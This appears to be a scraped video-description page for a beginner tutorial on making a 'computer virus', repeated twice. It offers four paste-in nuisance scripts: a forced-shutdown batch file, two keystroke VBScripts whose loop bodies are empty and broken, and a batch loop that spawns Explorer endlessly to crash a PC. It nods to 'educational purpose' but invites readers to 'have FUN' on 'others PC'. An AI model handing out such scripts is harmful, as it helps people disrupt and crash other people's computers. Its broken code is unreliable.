filmov
tv
HOW TO MAKE YOUR OWN COMPUTER VIRUS!!! - (Beginner) | TechWagon
![preview_player](https://i.ytimg.com/vi/dbjYJ6rW7X8/maxresdefault.jpg)
Показать описание
Tutorial on how to create your own virus in just a few steps; brought to you by techwagon.
Please comment down below if you have any queries or want more information regarding it.
Please like, comment, share this video and subscribe to our channel for more amazing videos.
Here are the following codes for the scripts:-
Just copy and paste these scripts in notepad and save it accordingly as shown in video.
This video is for educational purpose only, we are not responsible for any damaged caused to your PC or others PC, have FUN!!!
1. The Rebooter:
@echo off
shutdown -c “ERROR!!” -s
2. Backspace Deleter:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
loop
3. Infinite Typer:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
loop
4. Sytem Crasher:
@echo off
:repeat
Explorer
Goto repeat
Music : Jim Yousef - Firefly [NCS Release]
Artist : Jim Yousef
Please comment down below if you have any queries or want more information regarding it.
Please like, comment, share this video and subscribe to our channel for more amazing videos.
Here are the following codes for the scripts:-
Just copy and paste these scripts in notepad and save it accordingly as shown in video.
This video is for educational purpose only, we are not responsible for any damaged caused to your PC or others PC, have FUN!!!
1. The Rebooter:
@echo off
shutdown -c “ERROR!!” -s
2. Backspace Deleter:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
loop
3. Infinite Typer:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
loop
4. Sytem Crasher:
@echo off
:repeat
Explorer
Goto repeat
Music : Jim Yousef - Firefly [NCS Release]
Artist : Jim Yousef
Комментарии